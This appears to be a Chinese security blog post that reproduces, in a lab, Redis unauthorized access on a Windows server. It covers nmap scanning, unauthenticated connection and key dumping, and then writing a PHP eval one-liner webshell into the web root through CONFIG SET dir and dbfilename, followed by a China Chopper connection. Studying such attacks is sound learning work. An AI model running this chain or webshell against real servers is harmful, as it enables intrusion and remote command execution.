Redis未授权访问
最近在做校招题目的时候发现有问到未授权访问,特此搭建了诸多未授权访问的环境并且一一复现并做简单总结。再此记录下来
环境介绍
0x00环境搭建
我这里用到的是Microsoft(R) Windows(R) Server 2003, Enterprise Edition 32位服务器,所以下载的是32位的redis,如果是64位的请下载对应的版本
下载地址:https://github.com/MSOpenTech/redis/releases。
下载下来的压缩包将其放入C盘根目录,重命名为Redis。打开一个 CMD 窗口,cd 进入到 C:\Redis,输入 redis-server.exe Redis.conf
回车之后,如果显示如下界面就证明成功了
看到这个界面之后,此时另起一个 CMD 窗口,同样通过 cd 进入 C:\Redis 输入 redis-cli.exe -h 127.0.0.1 -p 6379
之后设置key值 set key zxc
取出key值 get key
在这里环境就已经搭建完成
0x01攻击方法
1.使用nmap获取目标端口信息
因为Redis默认端口号为6379,因此我们对6379端口进行扫描
1 nmap -A -p 6379 -script redis-info 192.168.50.130
这里看到,已经获取到了Redis的相关信息。
2.通过Redis未授权访问获取敏感信息
Redis在默认配置的情况下,是空口令,并且如果其默认端口6379对外开放的话,则可以远程访问,因此默认配置下的Redis我们可以直接连接并获取敏感信息。
1 ./redis-cli -h 192.168.50.130 2 3 info
查看里面对应的key值
keys *
get key
0x02 深化攻击
一、结合Web服务获取Webshell
1.1 环境搭建
在服务器搭建好Web服务器,这里为了方便,使用Phpstudy来进行搭建
1.2 通过redis未授权向网站根目录写入一句话木马,然后用菜刀链接,从而获得Webshell
Redis Config Set 命令 - 修改 redis 配置参数,无需重启
root@kali:~/redis-2.8.17/src# ./redis-cli -h 192.168.50.130 192.168.50.130:6379> CONFIG SET dir C://phpstudy/PHPTutorial/WWW OK 192.168.50.130:6379> set Webshell "<?php @eval($_POST[cmd]);?>" OK 192.168.50.130:6379> CONFIG SET dbfilename pa55.php OK 192.168.50.130:6379> save OK
此时,就已经在C://phpstudy/PHPTutorial/WWW目录下写入了一个内容为 "<?php @eval($_POST[cmd]);?>" ,文件名为 pa55.php 的php一句话木马
1.3通过菜刀连接:
文件管理界面
查看ipconfig信息:
